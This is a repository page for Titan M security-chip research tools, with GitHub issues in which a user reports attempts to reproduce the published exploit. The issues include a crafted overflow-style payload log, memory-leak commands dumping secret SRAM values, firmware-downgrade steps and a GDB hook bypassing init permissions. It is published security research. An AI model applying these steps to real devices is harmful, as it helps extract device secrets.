This repository contains the tools we used in our research on the Google Titan M chip

Overview

Titan M tools

In this repository, we publish the tools we used in our research on the Google Titan M chip.

We presented our results at Black Hat EU 21 and at the ROOTS workshop within DeepSec.

  • citadelimgloader: the Ghidra loader for Titan M firmware files
  • nugget_toolkit: the set of tools to trace messages and communicate with the chip
  • bin2rec: a set of scripts used to convert firmware files into rec files that can be used with the SPI rescue feature
  • BHEU_2021: the materials of our presentation at BlackHat Europe 2021 (the slides and the white paper)

NOTE

This project uses submodules. So after cloning the repository, do not forget to run:

$ git submodule update --init --recursive

Comments
  • Bug is not triggered

    Bug is not triggered

    I am trying to trigger the bug by the tools out of the box. But it looks like it is not easy to do. As I already mentioned in the previous report that the citadeld cannot be stopped on Android 11 (with October patches). The EC image was downgraded but not verified yet that the downgraded version is launched on boot up. I say "was downgraded" only in assumption that the 'fastboot oem citadel rescue command' returned 'OKAY' error code. Now I am trying to to dump the Boot ROM. No luck so far. Any leak subcommand returns fixed 12 bytes value:

    ./nosclient leak 0x0 0x16
    08 01 18 01 20 04 2a 04 00 00 00 00
    

    To get more debug information I modified that frida script to intercept the nos_call_application() directly in the 'nosclient' tool. Below is the output:

    11-14 17:00:46.753 21237 21242 D qb_parser: Found sanity function at: 0x6d82e2d90c
    11-14 17:00:46.753 21237 21242 D qb_parser: Hello from the other side
    11-14 17:00:46.753 21237 21242 D qb_parser: Sanity function returned 42
    11-14 17:00:46.887 21237 21237 D qb_parser: appID: 0x5, param: 0xd
    11-14 17:00:46.888 21237 21237 D qb_parser: request: 0x6e699a9010, request_size: 0x1ce
    11-14 17:00:46.888 21237 21237 D qb_parser: reply: 0x6ea99a88a0, reply_size_addr: 0x7fdb4a2df4
    11-14 17:00:46.897 21237 21237 D qb_parser: Request:
    11-14 17:00:46.897 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000000  0a c8 03 ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000010  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000020  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000030  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000040  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000050  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000060  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000070  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000080  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000090  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000a0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000b0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000c0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000d0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000e0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000f0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000100  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000110  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000120  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000130  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000140  ff ff ff ff ff ff ff ff ff ff ff 02 00 00 00 17  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000150  00 00 00 01 00 00 00 01 00 00 00 c0 bd f0 ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000160  ff ff ff ff ff ff ff ff ff ff ff 91 1a 05 00 44  ...............D
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000170  28 01 00 08 69 01 00 34 08 34 08 00 00 00 00 00  (...i..4.4......
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000180  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000190  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000001a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000001b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000001c0  00 00 00 00 00 00 00 03 8e 05 00 38 c8 03        ...........8..
    11-14 17:00:46.922 21237 21237 D qb_parser: Reply size:
    11-14 17:00:46.922 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.922 21237 21237 D qb_parser: 00000000  88 00 00 00                                      ....
    11-14 17:00:46.922 21237 21237 D qb_parser: Reply size is 136
    11-14 17:00:46.925 21237 21237 D qb_parser: Reply:
    11-14 17:00:46.925 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000000  0a 85 01 08 03 12 80 01 45 30 2d 32 00 00 00 00  ........E0-2....
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000080  00 00 00 00 00 00 00 00                          ........
    11-14 17:00:46.948 21237 21237 D qb_parser: Identity: ICpushReaderCert
    11-14 17:00:46.948 21237 21237 D qb_parser: {
    11-14 17:00:46.948 21237 21237 D qb_parser: 	IN
    11-14 17:00:46.948 21237 21237 D qb_parser: 
    11-14 17:00:46.948 21237 21237 D qb_parser: 	{
    11-14 17:00:46.948 21237 21237 D qb_parser:             x509Cert: "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff02000000170000000100000001000000c0bdf0ffffffffffffffffffffffffff911a050044280100086901003408340800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000038e0500"
    11-14 17:00:46.948 21237 21237 D qb_parser:             publicKeySize: 456
    11-14 17:00:46.948 21237 21237 D qb_parser: 	}
    11-14 17:00:46.948 21237 21237 D qb_parser: 	OUT
    11-14 17:00:46.948 21237 21237 D qb_parser: 
    11-14 17:00:46.948 21237 21237 D qb_parser: 	{
    11-14 17:00:46.948 21237 21237 D qb_parser:             result {
    11-14 17:00:46.948 21237 21237 D qb_parser:               result_code: STATUS_INVALID_DATA
    11-14 17:00:46.948 21237 21237 D qb_parser:               message: "E0-2\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
    11-14 17:00:46.948 21237 21237 D qb_parser:             }
    11-14 17:00:46.948 21237 21237 D qb_parser: 	}
    11-14 17:00:46.948 21237 21237 D qb_parser: }
    11-14 17:00:46.948 21237 21237 D qb_parser: ------------------------------------------------------------------------------------------------------
    11-14 17:00:46.949 21237 21237 D qb_parser: appID: 0x0, param: 0x4242
    11-14 17:00:46.949 21237 21237 D qb_parser: request: 0x6e699ad320, request_size: 0x230
    11-14 17:00:46.949 21237 21237 D qb_parser: reply: 0x6ea99a88a0, reply_size_addr: 0x7fdb4a2df4
    11-14 17:00:46.958 21237 21237 D qb_parser: Request:
    11-14 17:00:46.958 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000010  65 f9 04 00 e0 7e 01 00 41 41 41 41 41 41 41 41  e....~..AAAAAAAA
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000020  41 41 41 41 e3 15 05 00 00 00 00 00 16 00 00 00  AAAA............
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000030  e9 33 06 00 41 41 41 41 41 41 41 41 65 fe 04 00  .3..AAAAAAAAe...
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000040  41 41 41 41 41 41 41 41 41 41 41 41 65 f9 04 00  AAAAAAAAAAAAe...
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000050  48 df 01 00 41 41 41 41 41 41 41 41 41 41 41 41  H...AAAAAAAAAAAA
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000060  e3 15 05 00 00 00 00 00 16 00 00 00 99 07 05 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000070  41 41 41 41 41 41 41 41 65 fe 04 00 00 00 00 00  AAAAAAAAe.......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000080  41 41 41 41 41 41 41 41 b1 67 04 00 c1 dc 82 86  AAAAAAAA.g......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000090  8a 97 e8 da c0 35 4a db 7f 00 00 00 50 89 78 7f  .....5J.....P.x.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000a0  5f 00 00 00 00 00 00 00 00 00 00 00 00 7f 78 7f  _.............x.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000b0  5f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  _...............
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000c0  00 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000d0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000e0  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000f0  00 00 00 00 20 95 9b b9 6d 00 00 00 00 00 00 00  .... ...m.......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000100  00 00 00 00 10 95 9b b9 6d 00 00 00 00 00 00 00  ........m.......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000110  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000120  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000130  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000140  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000150  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000160  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000170  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000180  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000190  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001a0  00 00 00 00 b8 34 4a db 7f 00 00 00 b8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001b0  7f 00 00 00 b8 34 4a db 7f 00 00 00 b8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001c0  7f 00 00 00 40 8a 0c 1f 00 00 00 00 d8 34 4a db  [email protected]
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001d0  7f 00 00 00 b8 34 4a db 7f 00 00 00 f8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001e0  7f 00 00 00 f8 34 4a db 7f 00 00 00 f8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001f0  7f 00 00 00 f8 34 4a db 7f 00 00 00 98 35 4a db  .....4J......5J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000200  7f 00 00 00 78 35 4a db 7f 00 00 00 58 35 4a db  ....x5J.....X5J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000210  7f 00 00 00 38 35 4a db 7f 00 00 00 18 35 4a db  ....85J......5J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000220  7f 00 00 00 f8 34 4a db 7f 00 00 00 08 33 4a db  .....4J......3J.
    11-14 17:00:46.971 21237 21237 D qb_parser: Reply size:
    11-14 17:00:46.971 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.971 21237 21237 D qb_parser: 00000000  00 00 00 00                                      ....
    11-14 17:00:46.971 21237 21237 D qb_parser: Reply size is 0
    11-14 17:00:46.971 21237 21237 D qb_parser: Nugget: No handler yet for function #16962
    11-14 17:00:46.971 21237 21237 D qb_parser: ------------------------------------------------------------------------------------------------------
    11-14 17:00:46.972 21237 21237 D qb_parser: appID: 0x1, param: 0x0
    11-14 17:00:46.972 21237 21237 D qb_parser: request: 0x6e699a9010, request_size: 0x0
    11-14 17:00:46.972 21237 21237 D qb_parser: reply: 0x6ea99ab9c0, reply_size_addr: 0x7fdb4a2df4
    11-14 17:00:46.972 21237 21237 D qb_parser: Request has null size
    11-14 17:00:46.986 21237 21237 D qb_parser: Reply size:
    11-14 17:00:46.986 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.986 21237 21237 D qb_parser: 00000000  0c 00 00 00                                      ....
    11-14 17:00:46.986 21237 21237 D qb_parser: Reply size is 12
    11-14 17:00:46.987 21237 21237 D qb_parser: Reply:
    11-14 17:00:46.987 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.987 21237 21237 D qb_parser: 00000000  08 01 18 01 20 04 2a 04 00 00 00 00              .... .*.....
    11-14 17:00:46.998 21237 21237 D qb_parser: AVB: GetState
    11-14 17:00:46.998 21237 21237 D qb_parser: {
    11-14 17:00:46.998 21237 21237 D qb_parser: 	IN
    11-14 17:00:46.998 21237 21237 D qb_parser:  {}
    11-14 17:00:46.998 21237 21237 D qb_parser: 	OUT
    11-14 17:00:46.998 21237 21237 D qb_parser: 
    11-14 17:00:46.998 21237 21237 D qb_parser: 	{
    11-14 17:00:46.998 21237 21237 D qb_parser:             version: 1
    11-14 17:00:46.998 21237 21237 D qb_parser:             production: true
    11-14 17:00:46.998 21237 21237 D qb_parser:             number_of_locks: 4
    11-14 17:00:46.998 21237 21237 D qb_parser:             locks: "00000000"
    11-14 17:00:46.998 21237 21237 D qb_parser: 	}
    11-14 17:00:46.998 21237 21237 D qb_parser: }
    11-14 17:00:46.998 21237 21237 D qb_parser: ------------------------------------------------------------------------------------------------------
    
    

    Any idea why the bug is not triggered? Bad EC image stored in the Titan M?

    opened by NewDwarf 12
  • Does this research mean that Titan M is compromised?

    Does this research mean that Titan M is compromised?

    The short answer is "No". This research missed one important feature which is the key ladder' 'key manager'. This key manager is a part of the silicon which does at least sideloading of the AES, HMAC key into the internal key storage registers which are not visible for any part of software and not accessible via JTAG. To derive the real key inside the key manager block, many personalization things are used like DeviceID, Root key, and other hardware secrets. Some of them are stored in OTP, but some are implemented as a gate array. Moreover the bus to this gate array is scrambled to obfuscate the optical reverse engineering of the hardware. Internally, the key manager uses KMAC to derive the hidden keys inside the key ladder. This means that that the Titan M is still safe. The SW bug to be found and knowledge of data transferred between the Titan M and application processor is almost nothing for breaking security of Titan M as the key ladder' security is still not compromised. This is a good news as originally, after reading the presentation and white paper, I thought how Google does such fatal mistake in the security design.

    opened by NewDwarf 8
  • 'Firmware Downgrade with SPI Rescue' question

    'Firmware Downgrade with SPI Rescue' question

    Hi. I am going to play with this awesome project. But before, I would like to clarify some things.

    Whether I correctly understood, to downgrade the EC image, I have to download the "11.0.0 (RP1A.200720.009, Sep 2020)" image, unpack it, mount the 'vendor' partition, extract the 'ec.rec' from there and then push it to the device by means of the fastboot tool? UPDATE: Just found that the EC version which has required bugs is in the "11.0.0 RQ1A.210105.003, Jan 2021" factory image. ec.bin from that image exposes such string: brick_v0.0.8232-b1e3ea340 2020-09-25 16:57:52 wfrichar which is matched to the reported one. The log of flashing the ec image:

    $ fastboot stage ec.rec 
    Sending 'ec.rec' (185 KB)                          OKAY [  0.119s]
    Finished. Total time: 0.210s
    $ fastboot oem citadel rescue
                                                       (bootloader) Recovering citadel - it may take a couple of minutes
    OKAY [ 28.708s]
    Finished. Total time: 28.710s
    

    At the first glance, the image was written successfully. Are there options to verify from the userspace that the required image indeed runs? The /vendor/bin/hw/citadel_updater command doesn't work for this purpose.

    blueline:/data/local/tmp # /vendor/bin/hw/citadel_updater -l                                                                                                                        
    ERROR: Unable to connect
    ERROR: execute_command failed(1)!
    

    AOSP has such comment/code:

        // Citadel info (only enabled on -eng and -userdebug builds)
        if (!PropertiesHelper::IsUserBuild()) {
            RunCommandToFd(fd, "Citadel ID", {"/vendor/bin/hw/citadel_updater", "--id"});
            RunCommandToFd(fd, "Citadel VER", {"/vendor/bin/hw/citadel_updater", "-lv"});
            RunCommandToFd(fd, "Citadel SELFTEST", {"/vendor/bin/hw/citadel_updater", "--selftest"});
        }
    

    Could you, please, describe in more details how the firmware update based on the nugget task works. The presentation describes briefly how the firmware is updated by means of the nugget task. The unclear part is what app (from the userspace level) triggers firmware updating?

    Thanks.

    opened by NewDwarf 8
  • Another one inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    Another one inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    Sorry, guys for reporting about more issues. Maybe they exist because of some reasons (Google asked or something else). The presentation describes incorrect range of the key blob structure which should be encrypted. The claimed range is 0x2c0 - 0x3c4. Actually, this range is 0x2c0 - 0x5e0. That looks weird (as it is already doesn't look like a typo) but you missed padding (0xdc... array) from this range.

    opened by NewDwarf 4
  • BootROM reversing

    BootROM reversing

    I began reversing of the dumped BootROM. If I correctly defined, the entry point of the BootROM is:

    ROM:00001498             sub_1498
    ROM:00001498 00 21                       MOVS    R1, #0
    ROM:0000149A 0A 46                       MOV     R2, R1
    ROM:0000149C 0B 46                       MOV     R3, R1
    ROM:0000149E 0C 46                       MOV     R4, R1
    ROM:000014A0 0D 46                       MOV     R5, R1
    ROM:000014A2 0E 46                       MOV     R6, R1
    ROM:000014A4 0F 46                       MOV     R7, R1
    ROM:000014A6 88 46                       MOV     R8, R1
    ROM:000014A8 89 46                       MOV     R9, R1
    ROM:000014AA 8A 46                       MOV     R10, R1
    ROM:000014AC 8B 46                       MOV     R11, R1
    ROM:000014AE 8C 46                       MOV     R12, R1
    ROM:000014B0 00 48                       LDR     R0, =0x14B9
    ROM:000014B2 00 47                       BX      R0              ; loc_14B8
    ROM:000014B2             ; End of function sub_1498
    

    The BootROM actively uses the high addresses 0xe0000000 ... These addresses are defined as CPU registers. What are actually these registers?

    ROM:00001A8C             sub_1A8C                                ; CODE XREF: ROM:000014BC↑p
    ROM:00001A8C 06 4A                       LDR     R2, =0xE000EDFC
    ROM:00001A8E 13 68                       LDR     R3, [R2]
    ROM:00001A90 03 F0 7E 43                 AND.W   R3, R3, #0xFE000000
    ROM:00001A94 43 F0 80 73                 ORR.W   R3, R3, #0x1000000
    ROM:00001A98 13 60                       STR     R3, [R2]
    ROM:00001A9A 04 4A                       LDR     R2, =0xE0001000
    ROM:00001A9C 13 68                       LDR     R3, [R2]
    ROM:00001A9E 43 F0 01 03                 ORR.W   R3, R3, #1
    ROM:00001AA2 13 60                       STR     R3, [R2]
    ROM:00001AA4 70 47                       BX      LR
    ROM:00001AA4             ; End of function sub_1A8C
    

    And another one high address range is in 0x40000000 ... defined as HW registers. Whether I correctly understand that it is timers, watchdog, global control registers to configure, say, access to the memory regions, RSA HW accelerator registers, etc...?

    ROM:00001B5C             sub_1B5C                                ; CODE XREF: sub_1B70:loc_1B7E↓p
    ROM:00001B5C                                                     ; sub_1BE4+14↓p ...
    ROM:00001B5C 03 4B                       LDR     R3, =0x40320030
    ROM:00001B5E 18 68                       LDR     R0, [R3]
    ROM:00001B60 80 F0 04 00                 EOR.W   R0, R0, #4
    ROM:00001B64 C0 F3 80 00                 UBFX.W  R0, R0, #2, #1
    ROM:00001B68 70 47                       BX      LR
    ROM:00001B68             ; End of function sub_1B5C
    ROM:00001B68
    ROM:00001B68             ; ---------------------------------------------------------------------------
    ROM:00001B6A 00                          DCB    0
    ROM:00001B6B BF                          DCB 0xBF
    ROM:00001B6C 30 00 32 40 off_1B6C        DCD 0x40320030          ; DATA XREF: sub_1B5C↑r
    

    If you have already defined purpose of some HW and CPU registers, could you share it, please?

    opened by NewDwarf 4
  • leak.sh doesn't work

    leak.sh doesn't work

    On attempt to run the leak.sh script, I get:

    blueline:/data/local/tmp # ./leak.sh brom                                                                                                                                           
    Unable to stop service 'vendor.citadeld'
    See dmesg for error reason.
    Failed, retry index 0
    Failed, retry index 0
    Failed, retry index 0
    ...
    

    The problem is the citadeld cannot be stopped by the 'stop vendor.citadeld' command. dmesg reports: init: Unable to set property 'ctl.stop' from uid:0 gid:0 pid:11245: Invalid permissions to perform 'stop' on 'vendor.citadeld'

    Attaching the GDB debugger to the init process (PID 1) and hooking the

    bool CheckControlPropertyPerms(const std::string& name, const std::string& value,
                                   const std::string& source_context, const ucred& cr)
    

    function by returning 1 helps to stop the citadeld process. I am using android version 11.0.0 (RQ3A.211001.001, Oct 2021). What android version you used to run the dumping script?

    opened by NewDwarf 4
  • AES key ladder

    AES key ladder

    The Titan M chipset has interesting hardware feature called a 'key ladder' for several algorithms. Not sure what is the primary purpose of this feature, performance of the crypto algorithms or security. I would think it is a 'security feature' if the 'trusted root key' was fused directly in the OTP area of Titan M and was not accessible from the NOS' tasks as well. If everything can be sniffed in the middle of the user land <-> the NOS task as well as application processor <-> Titan M by means of the breakout board, it doesn't look like a HSM. But it is just my personal opinion. I am not a security expert. Probably, below information someone can find useful: The AES key ladder has several chipset specific registers to implement encryption/decryption.

    1. Input register 'AES_WFIFO_DATA' located at 0x40230008. The register has a FIFO concept. To store the 128 bit block, it is divided on four 32-bit blocks and pushed to the same register.
    2. Output register 'AES_RFIFO_DATA' located at 0x4023000C. It has the similar FIFO concept to read the processed data from the key ladder.
    3. Status register 'AES_RFIFO_EMPTY' located at 0x40230070. It works like while ( MEMORY[0x40230070] );
    4. Control register 'AES_CTRL' located at 0x40230000. This register is used to control the key size, cipher mode, processing direction (encryption/decryption), endianness.
    5. Key expansion register 'AES_KEY_START' located at 0x4023004C. Writing '1' to this register triggers key expansion. Waiting of the key expansion is performed by while ( MEMORY[0x4023004C] );.
    6. To store the initialization vector, 'GR_KEYMGR_AES_CTR' (??? Counter mode is used?) registers are used. There are four such registers located at 0x40230050, 0x40230054, 0x40230058, 0x4023005C.
    7. @max-r-b Could you confirm that the register set '0x40233300, 0x40233304, ..., 0x40233320' are used to store the AES key? It seems these registers are also involved in HMAC computation. There is, definitely, the register 0x4023002C, ... for storing the raw AES key, but for some reasons, km_generate_key() doesn't use these registers.
    opened by NewDwarf 2
  • Getting salt and other random things

    Getting salt and other random things

    Hi. I noticed interesting behaviour on getting the sensitive information from SRAM which is used for key deriving. The valid value is only periodically returned. In most cases it is just zero'ed buffer.

    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                          
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                              
    4b f5 12 2f 34 45 54 c5 3b de 2e bb 8c d2 b7 e3 d1 60 0a d6 31 c3 85 a5 d7 cc e2 3c 77 85 45 9a 
    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                                                                                                                           
    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                              
    4b f5 12 2f 34 45 54 c5 3b de 2e bb 8c d2 b7 e3 d1 60 0a d6 31 c3 85 a5 d7 cc e2 3c 77 85 45 9a 
    ==========================
    
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20                                                                                                                              
    9a e2 3c 4d 13 6d 1b 8c a5 70 2f a2 54 20 f0 dd d3 52 f2 04 b4 34 86 1f 74 06 90 0c 72 0d d5 89 
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20                                                                                                                              
    9a e2 3c 4d 13 6d 1b 8c a5 70 2f a2 54 20 f0 dd d3 52 f2 04 b4 34 86 1f 74 06 90 0c 72 0d d5 89 
    ===========================
    
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20                                                                                                                              
    70 32 ea 8e 4c db 6d 0c 1e 4f 2e f2 d6 d6 d3 99 4d 58 ba 4b b9 45 fd ff c7 cc 4a 2e 15 bd 67 66 
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20                                                                                                                          
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20                                                                                                                              
    70 32 ea 8e 4c db 6d 0c 1e 4f 2e f2 d6 d6 d3 99 4d 58 ba 4b b9 45 fd ff c7 cc 4a 2e 15 bd 67 66 
    ==========================
    
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20                                                                                                                          
    67 53 b7 a2 53 55 9b 8c bf b8 f2 66 e5 75 05 a8 7a 49 b4 73 cf 73 8f 07 41 c7 61 56 78 2b 79 03 
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
